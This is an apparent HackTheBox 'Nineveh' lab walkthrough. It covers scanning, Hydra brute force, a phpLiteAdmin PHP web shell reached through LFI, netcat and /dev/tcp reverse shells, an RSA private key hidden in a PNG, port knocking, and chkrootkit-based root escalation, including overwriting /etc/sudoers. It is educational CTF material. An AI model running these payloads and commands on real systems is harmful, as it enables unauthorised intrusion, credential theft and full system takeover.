This post is a walkthrough of the HackTheBox machine Nineveh.
Hackthebox Nineveh Walkthrough

Reconnaissance
Port-Scan
sudo nmap -sT -p- --min-rate 10000 -Pn -oN alltcp.txt 10.10.10.43
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-10 18:43 EST
Nmap scan report for 10.10.10.43
Host is up (0.050s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
sudo nmap -sS -T4 -p- -sV -sC 10.10.10.43
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-10 18:43 EST
Stats: 0:00:50 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 44.31% done; ETC: 18:45 (0:01:02 remaining)
Nmap scan report for 10.10.10.43
Host is up (0.050s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after: 2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
nmap -p 80,443 -Pn -sC -sV -oN detailed.txt 10.10.10.43
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-10 18:48 EST
Nmap scan report for 10.10.10.43
Host is up (0.048s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after: 2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
sudo nmap -p 80,443 --script vuln 10.10.10.43
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-10 18:49 EST
Nmap scan report for 10.10.10.43
Host is up (0.052s latency).
PORT STATE SERVICE
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /info.php: Possible information file
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
443/tcp open https
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /db/: BlogWorx Database
|_ /db/: Potentially interesting folder
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_sslv2-drown:
Directory Scanning
Both an HTTP and an HTTPS site are running on the server, and they serve different content.
I ran gobuster against each of them separately and got two different sets of directories.
gobuster dir -u http://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.43
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/03/11 18:48:35 Starting gobuster in directory enumeration mode
===============================================================
/department (Status: 301) [Size: 315] [--> http://10.10.10.43/department/]
/server-status (Status: 403) [Size: 299]
Progress: 95835 / 220561 (43.45%) ^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/03/11 18:55:44 Finished
===============================================================
gobuster dir -u https://10.10.10.43 -w /usr/share/wordlists/dirb/common.txt -k
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://10.10.10.43
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/03/10 19:22:33 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 291]
/.htaccess (Status: 403) [Size: 296]
/.htpasswd (Status: 403) [Size: 296]
/db (Status: 301) [Size: 309] [--> https://10.10.10.43/db/]
/index.html (Status: 200) [Size: 49]
/server-status (Status: 403) [Size: 300]
With bigger wordlist
gobuster dir -u https://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://10.10.10.43
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/03/17 06:57:14 Starting gobuster in directory enumeration mode
===============================================================
/db (Status: 301) [Size: 309] [--> https://10.10.10.43/db/]
/server-status (Status: 403) [Size: 300]
/secure_notes (Status: 301) [Size: 319] [--> https://10.10.10.43/secure_notes/]
From the scan results above, only ports 80 and 443 are open, and the HTTP and HTTPS sites expose different directories.
For SSL site
The certificate is issued for nineveh.htb, and the vuln scripts flagged /db/ ("BlogWorx Database", "Potentially interesting folder"). Browsing to https://10.10.10.43/db/ shows a login page.
For HTTP Site
gobuster found /department (301 to http://10.10.10.43/department/) and /server-status (403). /department/ has a login page of its own.
Bruteforce using Hydra
To use Hydra against a login form we need to identify four parameters:
<IP Address> = ""
<Login Page> = ""
<Request Body> = ""
<Error Message> = ""
To identify these parameters, intercept the login request with Burp.

Based on the intercepted request, these are the values for the HTTPS site (/db/):
<IP Address> = "10.10.10.43"
<Login Page> = "/db/index.php"
<Request Body> = "password=^PASS^&login=Log+In&proc_login=true"
<Error Message> = "Incorrect password."
Now build the Hydra command. Hydra always requires a username (-l); this login form only has a password field and the request body contains no ^USER^ placeholder, so any fixed value will do. Use the "https-post-form" module since it is an SSL site.
-V (verbose) shows each username/password combination Hydra tries.
-s specifies the port (443 here). It can be omitted, because https-post-form already defaults to 443.
hydra 10.10.10.43 -l rchitect -P /usr/share/SecLists-master/Passwords/twitter-banned.txt https-post-form "/db/index.php:password=^PASS^&login=Log+In&proc_login=true:Incorrect password." -V -s 443

Hydra finds the password.

After logging in, the application identifies itself as phpLiteAdmin 1.9. There are public exploits for this version.

Brute force for the HTTP website (username/password combination)
Intercept the login request using Burp.

Fill in the four parameters:
<IP Address> = "10.10.10.43"
<Login Page> = "/department/login.php"
<Request Body> = "username=^USER^&password=^PASS^"
<Error Message> = "Invalid Password!"
Hydra command (the username is fixed to admin with -l, so ^USER^ expands to admin; Hydra matches the failure string as a substring, so "Invalid Password" is enough):
hydra 10.10.10.43 -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password" -V

The password is cracked:
password: 1q2w3e4r5t
Logging in as admin with this password leads to the page below.


LFI
The notes parameter of /department/manage.php turned out to be vulnerable to local file inclusion; /etc/passwd could be read through it.

LFI to code execution
At this stage we look for a way to turn the LFI into code execution, which would give us a reverse shell. The HTTPS site runs phpLiteAdmin, so the plan is to make it write a file containing PHP and then include that file through the LFI.

I found a GitHub PoC (F-Masood, PHPLiteAdmin-1.9.3 Exploit-PoC) explaining the phpLiteAdmin exploit.
Following that PoC, I created a database. Note that it must be created with a .php extension, as follows:

Then select the new database and edit it.

Give the table any name.

Provide the PHP web shell as the column's default value, as below. Use double quotes (") rather than single quotes (') inside the PHP, because the default value ends up inside a single-quoted SQL string literal and a single quote would break the statement.
<?php system($_GET["cmd"]);?>

The table has been created inside the database, as below.

phpLiteAdmin displays the path of the database file; for this test it is /var/tmp/Rchitect.php, which is the path we need to include.

To access this database file (now a PHP command shell) we use the LFI vulnerability tested earlier (/etc/passwd was readable through it).
I used the paths below to reach the command shell written through the database. The notes value keeps the /ninevehNotes/ prefix and uses ../ to traverse to /var/tmp/:
http://10.10.10.43/department/manage.php?notes=/ninevehNotes/../var/tmp/Rchitect.php&cmd=id
http://10.10.10.43/department/manage.php?notes=/ninevehNotes/../var/tmp/Rchitect.php&cmd=pwd


Reverse shell as www-data
The cmd value above (id, pwd) can be replaced with a reverse shell one-liner; I used this one:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.9 8989 >/tmp/f
Make sure to URL-encode the payload (Ctrl+U in Burp) before sending it, since it contains characters such as & and ; that would otherwise break the query string. Sometimes it needs to be tried a few times before the reverse shell connects.
This is how the encoded request looks:


└─$ rlwrap nc -nvlp 8989
listening on [any] 8989 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.43] 41898
/bin/sh: 0: can't access tty; job control turned off
whoami
www-data
which shell
which $shell
python -c 'import pty; pty.spawn("/bin/bash")'
/bin/sh: 4: python: not found
python3 -c 'import pty; pty.spawn("/bin/bash")'
whoami
whoami
www-data
Privilege Escalation
During directory enumeration we found one image that was never used anywhere.

Running strings on the image reveals more:
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAri9EUD7bwqbmEsEpIeTr2KGP/wk8YAR0Z4mmvHNJ3UfsAhpI
H9/Bz1abFbrt16vH6/jd8m0urg/Em7d/FJncpPiIH81JbJ0pyTBvIAGNK7PhaQXU
PdT9y0xEEH0apbJkuknP4FH5Zrq0nhoDTa2WxXDcSS1ndt/M8r+eTHx1bVznlBG5
FQq1/wmB65c8bds5tETlacr/15Ofv1A2j+vIdggxNgm8A34xZiP/WV7+7mhgvcnI
3oqwvxCI+VGhQZhoV9Pdj4+D4l023Ub9KyGm40tinCXePsMdY4KOLTR/z+oj4sQT
X+/1/xcl61LADcYk0Sw42bOb+yBEyc1TTq1NEQIDAQABAoIBAFvDbvvPgbr0bjTn
KiI/FbjUtKWpWfNDpYd+TybsnbdD0qPw8JpKKTJv79fs2KxMRVCdlV/IAVWV3QAk
FYDm5gTLIfuPDOV5jq/9Ii38Y0DozRGlDoFcmi/mB92f6s/sQYCarjcBOKDUL58z
GRZtIwb1RDgRAXbwxGoGZQDqeHqaHciGFOugKQJmupo5hXOkfMg/G+Ic0Ij45uoR
JZecF3lx0kx0Ay85DcBkoYRiyn+nNgr/APJBXe9Ibkq4j0lj29V5dT/HSoF17VWo
9odiTBWwwzPVv0i/JEGc6sXUD0mXevoQIA9SkZ2OJXO8JoaQcRz628dOdukG6Utu
Bato3bkCgYEA5w2Hfp2Ayol24bDejSDj1Rjk6REn5D8TuELQ0cffPujZ4szXW5Kb
ujOUscFgZf2P+70UnaceCCAPNYmsaSVSCM0KCJQt5klY2DLWNUaCU3OEpREIWkyl
1tXMOZ/T5fV8RQAZrj1BMxl+/UiV0IIbgF07sPqSA/uNXwx2cLCkhucCgYEAwP3b
vCMuW7qAc9K1Amz3+6dfa9bngtMjpr+wb+IP5UKMuh1mwcHWKjFIF8zI8CY0Iakx
DdhOa4x+0MQEtKXtgaADuHh+NGCltTLLckfEAMNGQHfBgWgBRS8EjXJ4e55hFV89
P+6+1FXXA1r/Dt/zIYN3Vtgo28mNNyK7rCr/pUcCgYEAgHMDCp7hRLfbQWkksGzC
fGuUhwWkmb1/ZwauNJHbSIwG5ZFfgGcm8ANQ/Ok2gDzQ2PCrD2Iizf2UtvzMvr+i
tYXXuCE4yzenjrnkYEXMmjw0V9f6PskxwRemq7pxAPzSk0GVBUrEfnYEJSc/MmXC
iEBMuPz0RAaK93ZkOg3Zya0CgYBYbPhdP5FiHhX0+7pMHjmRaKLj+lehLbTMFlB1
MxMtbEymigonBPVn56Ssovv+bMK+GZOMUGu+A2WnqeiuDMjB99s8jpjkztOeLmPh
PNilsNNjfnt/G3RZiq1/Uc+6dFrvO/AIdw+goqQduXfcDOiNlnr7o5c0/Shi9tse
i6UOyQKBgCgvck5Z1iLrY1qO5iZ3uVr4pqXHyG8ThrsTffkSVrBKHTmsXgtRhHoc
il6RYzQV/2ULgUBfAwdZDNtGxbu5oIUB938TCaLsHFDK6mSTbvB/DywYYScAWwF7
fw4LVXdQMjNJC3sn3JaqY1zJkE4jXlZeNQvCx4ZadtdJD9iO+EUG
-----END RSA PRIVATE KEY-----
secret/nineveh.pub
0000644
0000041
0000041
00000000620
13126060277
014541
ustar
www-data
www-data
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuL0RQPtvCpuYSwSkh5OvYoY//CTxgBHRniaa8c0ndR+wCGkgf38HPVpsVuu3Xq8fr+N3ybS6uD8Sbt38Umdyk+IgfzUlsnSnJMG8gAY0rs+FpBdQ91P3LTEQQfRqlsmS6Sc/gUflmurSeGgNNrZbFcNxJLWd238zyv55MfHVtXOeUEbkVCrX/CYHrlzxt2zm0ROVpyv/Xk5+/UDaP68h2CDE2CbwDfjFmI/9ZXv7uaGC9ycjeirC/EIj5UaFBmGhX092Pj4PiXTbdRv0rIabjS2KcJd4+wx1jgo4tNH/P6iPixBNf7/X/FyXrUsANxiTRLDjZs5v7IETJzVNOrU0R amrois@nineveh.htb
It seems to contain an archive; binwalk confirms it and extracts it:
binwalk 38.png
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 1497 x 746, 8-bit/color RGB, non-interlaced
84 0x54 Zlib compressed data, best compression
2881744 0x2BF8D0 POSIX tar archive (GNU)
┌──(rocky㉿kali)-[~/hckbox/nineveh]
└─$ binwalk -e 38.png
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 1497 x 746, 8-bit/color RGB, non-interlaced
84 0x54 Zlib compressed data, best compression
2881744 0x2BF8D0 POSIX tar archive (GNU)
ls -al
total 2948
drwxr-xr-x 4 rocky rocky 4096 Mar 17 20:35 .
drwxr-xr-x 45 rocky rocky 4096 Mar 10 18:39 ..
-rw-r--r-- 1 rocky rocky 1492 Mar 10 19:32 10883.txt
-rw-r--r-- 1 rocky rocky 1603 Mar 10 19:43 24044.txt
-rw-r--r-- 1 rocky rocky 2891984 Mar 17 19:57 38.png
drwxr-xr-x 3 rocky rocky 4096 Mar 17 20:35 _38.png.extracted
-rw-r--r-- 1 rocky rocky 807 Mar 10 19:32 5480.txt
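How binwalk finds an appended archive, as an added example that is not part of the original post: a PNG ends with its IEND chunk, so anything after that chunk is foreign data, and the "POSIX tar archive" hit at 0x2BF8D0 is just a tar header (with "ustar" at offset 257) sitting past the image. The script below walks the chunk list to find where the image really ends and checks the trailer. The PNG and the tar inside it are constructed inline; the member name secret/nineveh.pub and its contents are placeholders, not the real key. Only the sample is made up, the detection logic is general.

```python
"""Locate data appended after a PNG's IEND chunk and check whether it is a
tar archive, the way 38.png carried the secret/ directory.
Added example for this walkthrough; not code from the post. The sample PNG
and tar are built inline so the script runs offline."""
import io
import struct
import tarfile
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk: length, type, data, CRC32(type + data)."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_sample_png() -> bytes:
    """A valid 1x1 RGB PNG, built by hand so no image library is needed."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # 1x1, 8-bit, RGB
    scanline = b"\x00" + b"\xff\x00\x00"                  # filter byte + one red pixel
    return (PNG_SIG
            + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"IDAT", zlib.compress(scanline, 9))
            + png_chunk(b"IEND", b""))


def build_sample_tar(members: dict) -> bytes:
    """A GNU-format tar (as binwalk reported) from a {name: bytes} dict."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.GNU_FORMAT) as tar:
        for name, payload in members.items():
            info = tarfile.TarInfo(name)
            info.size = len(payload)
            tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def png_end_offset(data: bytes) -> int:
    """Walk the chunks and return the offset just past IEND's CRC."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, = struct.unpack(">I", data[pos:pos + 4])
        ctype = data[pos + 4:pos + 8]
        pos += 8 + length + 4            # header + data + CRC
        if ctype == b"IEND":
            return pos
    raise ValueError("no IEND chunk")


def trailing_data(data: bytes) -> tuple:
    """(offset, trailer): everything after the image proper."""
    off = png_end_offset(data)
    return off, data[off:]


def looks_like_tar(blob: bytes) -> bool:
    """Every ustar/GNU tar header carries 'ustar' at offset 257."""
    return len(blob) >= 512 and blob[257:262] == b"ustar"


def extract_names(trailer: bytes) -> list:
    """Member names of the appended archive (what binwalk -e would write out)."""
    with tarfile.open(fileobj=io.BytesIO(trailer), mode="r") as tar:
        return tar.getnames()


def inspect(data: bytes) -> dict:
    off, trailer = trailing_data(data)
    return {"iend_end": off, "trailer_len": len(trailer), "is_tar": looks_like_tar(trailer)}


if __name__ == "__main__":
    png = build_sample_png()
    stego = png + build_sample_tar({"secret/nineveh.pub": b"ssh-rsa AAAA... amrois@nineveh.htb\n"})
    print(inspect(png))      # no trailer
    print(inspect(stego))    # trailer starts where the image ends, is_tar True
    print(extract_names(trailing_data(stego)[1]))
```

The same walk works on any PNG pulled from a web root: a non-zero trailer_len is the thing to look at first, whether or not it happens to be a tar.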
I tried SSH with the extracted key (even though port 22 was not among the open ports). It did not work:
┌──(rocky㉿kali)-[~/hckbox/nineveh/_38.png.extracted/secret]
└─$ ssh -i nineveh.priv 10.10.10.43
ssh: connect to host 10.10.10.43 port 22: Connection timed out
Back in the www-data shell, there is mail for the user amrois:
cat /var/spool/mail/amrois
From root@nineveh.htb Fri Jun 23 14:04:19 2017
Return-Path: <root@nineveh.htb>
X-Original-To: amrois
Delivered-To: amrois@nineveh.htb
Received: by nineveh.htb (Postfix, from userid 1000)
id D289B2E3587; Fri, 23 Jun 2017 14:04:19 -0500 (CDT)
To: amrois@nineveh.htb
From: root@nineveh.htb
Subject: Another Important note!
Message-Id: <20170623190419.D289B2E3587@nineveh.htb>
Date: Fri, 23 Jun 2017 14:04:19 -0500 (CDT)
Amrois! please knock the door next time! 571 290 911
Initially I could not understand the meaning of this. Then I checked whether any "knock" service is running:
ps auxww | grep knoc
www-data 661 0.0 0.0 11288 936 pts/2 S+ 00:51 0:00 grep knoc
root 1302 1.0 0.2 8756 2224 ? Ss Mar17 3:14 /usr/sbin/knockd -d -i ens160
I also checked for locally listening services, since the nmap scan showed only ports 80 and 443 from the outside.

The knockd configuration explains the numbers in the mail:
cat /etc/knockd.conf
[options]
logfile = /var/log/knockd.log
interface = ens160
[openSSH]
sequence = 571, 290, 911
seq_timeout = 5
start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
[closeSSH]
sequence = 911,290,571
seq_timeout = 5
start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
This says that if we send TCP SYN packets (knocks) to ports 571, 290 and 911 in that order within 5 seconds, knockd inserts an iptables rule that allows our source IP to reach port 22. The reverse sequence removes it again.
Let's try it with a simple nmap loop (one SYN per port, no retries):
for x in 571 290 911; do nmap -Pn --max-retries 0 -p $x 10.10.10.43 && sleep 1; done
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-18 05:12 EDT
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.43
Host is up.
PORT STATE SERVICE
571/tcp filtered umeter
Nmap done: 1 IP address (1 host up) scanned in 1.08 seconds
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-18 05:12 EDT
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.43
Host is up.
PORT STATE SERVICE
290/tcp filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 1.08 seconds
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-18 05:12 EDT
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.43
Host is up.
PORT STATE SERVICE
911/tcp filtered xact-backup
Nmap done: 1 IP address (1 host up) scanned in 1.08 seconds
Try SSH immediately after the knock, from the same IP:
ssh -i nineveh.priv amrois@10.10.10.43
Ubuntu 16.04.2 LTS
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
288 packages can be updated.
207 updates are security updates.
You have mail.
Last login: Fri Mar 18 03:46:32 2022 from 10.10.14.9
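The knock above is done with nmap; as an added example (not code from the post), the script below parses a knockd.conf, pulls out the open sequence and sends the knocks with plain TCP connects. Each connect attempt emits the SYN that the tcpflags = syn rule matches, and it does not matter that the ports are filtered or refused, only the SYN counts. The config text is the one shown above, embedded inline so the script runs offline; the host and timing values are assumptions, and the whole sequence must finish within seq_timeout (5 seconds here) from one source address.

```python
"""Parse knockd.conf and replay the open sequence with TCP connects.
Added example for this walkthrough; not code from the post or from knockd.
KNOCKD_CONF is the configuration shown above, embedded so this runs offline."""
import configparser
import socket
import time

KNOCKD_CONF = """\
[options]
logfile = /var/log/knockd.log
interface = ens160
[openSSH]
sequence = 571, 290, 911
seq_timeout = 5
start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
[closeSSH]
sequence = 911,290,571
seq_timeout = 5
start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
"""


def _load(conf_text: str) -> configparser.ConfigParser:
    # interpolation=None: knockd's %IP% would otherwise be read as a format directive
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(conf_text)
    return cp


def parse_sequences(conf_text: str) -> dict:
    """Map each knock section to its port list, e.g. {'openSSH': [571, 290, 911], ...}."""
    cp = _load(conf_text)
    seqs = {}
    for section in cp.sections():
        if section == "options" or not cp.has_option(section, "sequence"):
            continue
        ports = []
        for item in cp.get(section, "sequence").split(","):
            port = item.strip().split(":")[0]   # knockd allows 571:tcp / 571:udp; tcp assumed
            ports.append(int(port))
        seqs[section] = ports
    return seqs


def seq_timeout(conf_text: str, section: str) -> int:
    """Seconds knockd allows for the whole sequence to arrive."""
    return _load(conf_text).getint(section, "seq_timeout")


def knock(host: str, ports: list, delay: float = 0.5, timeout: float = 0.3) -> list:
    """Send one SYN per port in order; returns the ports knocked.
    The connect result is ignored: refused or timed out still sent the SYN."""
    sent = []
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect_ex((host, port))
        finally:
            s.close()
        sent.append(port)
        time.sleep(delay)   # keep order, stay well inside seq_timeout
    return sent


if __name__ == "__main__":
    seqs = parse_sequences(KNOCKD_CONF)
    budget = seq_timeout(KNOCKD_CONF, "openSSH")
    assert len(seqs["openSSH"]) * (0.3 + 0.5) < budget, "knocks would be too slow"
    print(knock("10.10.10.43", seqs["openSSH"]))   # then: ssh -i nineveh.priv amrois@10.10.10.43
```

Sending the closeSSH sequence afterwards removes the rule again, which is worth doing on a shared box so the opened port does not stay reachable from your address.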
amrois@nineveh:~$ sudo -l
As LinPEAS did not reveal anything useful, I ran pspy and could see chkrootkit being executed periodically by a cron job.

Let's search for an exploit for chkrootkit.

According to this exploit, chkrootkit executes any file named "update" under /tmp when it runs, so we drop our payload there and make it executable:
amrois@nineveh:/tmp$ printf '#!/bin/sh\n' > update
amrois@nineveh:/tmp$ printf '/bin/bash -c "/bin/bash -i > /dev/tcp/10.10.14.9/5555 0<&1"\n' >> update
amrois@nineveh:/tmp$ chmod +x update
Once the chkrootkit cron job runs, we get a reverse shell as root:
└─$ rlwrap nc -nvlp 5555
listening on [any] 5555 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.43] 49824
whoami
root
pwd
/root
Other method: add the existing user to sudoers to escalate privileges. Note that the single > overwrites /etc/sudoers, so every other rule on the box is lost; appending with >> would keep them.
amrois@nineveh:/tmp$ echo 'echo "amrois ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > update
amrois@nineveh:/tmp$ chmod +x update
amrois@nineveh:/tmp$ sudo bash        # once the cron job has run update
root@nineveh:/tmp# whoami
root
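The reason a file called update in /tmp gets executed, as an added illustration (not from the post and not chkrootkit's real script): chkrootkit's slapper() check in versions before 0.50 (CVE-2014-0476) collects suspicious paths with the unquoted line file_port=$file_port $i. When $file_port is empty, the shell reads that as an empty assignment followed by a command, so the matched file, /tmp/update among them, is run with the privileges of the cron job, root here. The loop below is a minimal re-creation run through /bin/sh in a scratch directory, next to the quoted form that fixes it; the directory, marker file and SLAPPER_FILES value are placeholders.

```python
"""Reproduce the word-splitting bug behind the chkrootkit /tmp/update
privilege escalation (CVE-2014-0476) in a scratch directory.
Added example for this walkthrough; not code from the post or chkrootkit.
The loops below re-create the shape of slapper()'s list building, not the
real script."""
import os
import stat
import subprocess
import tempfile

VULNERABLE_LOOP = r'''
file_port=""
for i in $SLAPPER_FILES; do
  if [ -f "$i" ]; then
    file_port=$file_port $i      # BUG: with file_port empty this runs $i
  fi
done
'''

FIXED_LOOP = r'''
file_port=""
for i in $SLAPPER_FILES; do
  if [ -f "$i" ]; then
    file_port="$file_port $i"    # quoted: plain string concatenation
  fi
done
'''


def run_check(loop: str) -> bool:
    """Plant an 'update' file that drops a marker when executed, run the
    given loop over it with /bin/sh, and report whether the marker appeared."""
    work = tempfile.mkdtemp()
    marker = os.path.join(work, "executed")
    update = os.path.join(work, "update")          # stands in for /tmp/update
    with open(update, "w") as fh:
        fh.write(f"#!/bin/sh\ntouch '{marker}'\n")
    os.chmod(update, os.stat(update).st_mode | stat.S_IXUSR)
    env = dict(os.environ, SLAPPER_FILES=update)   # chkrootkit hard-codes /tmp/update here
    subprocess.run(["/bin/sh", "-c", loop], env=env, check=True)
    return os.path.exists(marker)


if __name__ == "__main__":
    print("vulnerable loop executed the file:", run_check(VULNERABLE_LOOP))   # True
    print("fixed loop executed the file:     ", run_check(FIXED_LOOP))        # False
```

This is also why the payload needs the execute bit (chmod +x): the shell is invoking the path as a command, not sourcing it.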
Key-Learnings
The initial scan shows only ports 80 and 443, but the two websites are different. It is important to run directory enumeration on both the HTTP and the HTTPS site; here the db, department and secure_notes folders only showed up after enumerating each site separately.
Both sites have login pages. Normally I avoid brute force unless I find a wordlist on the server itself, but in this case both logins (HTTP and HTTPS) were obtained with Hydra even though no wordlist was found on the server; I used the rockyou wordlist for the /department login.
After logging in, the application (phpLiteAdmin 1.9) was identified, and there is a public exploit for this version.
Identifying the LFI was the tricky part. Once the database with the PHP command shell was created, phpLiteAdmin showed that it was stored under /var/tmp/, which was the hint to look for an LFI to include it.
For privilege escalation I could not get any hints from the usual lifesaver (LinPEAS). Analysing the image and finding the SSH private key was the crucial step.
The SSH port was not open, though; port knocking was one more new service we learned through this machine.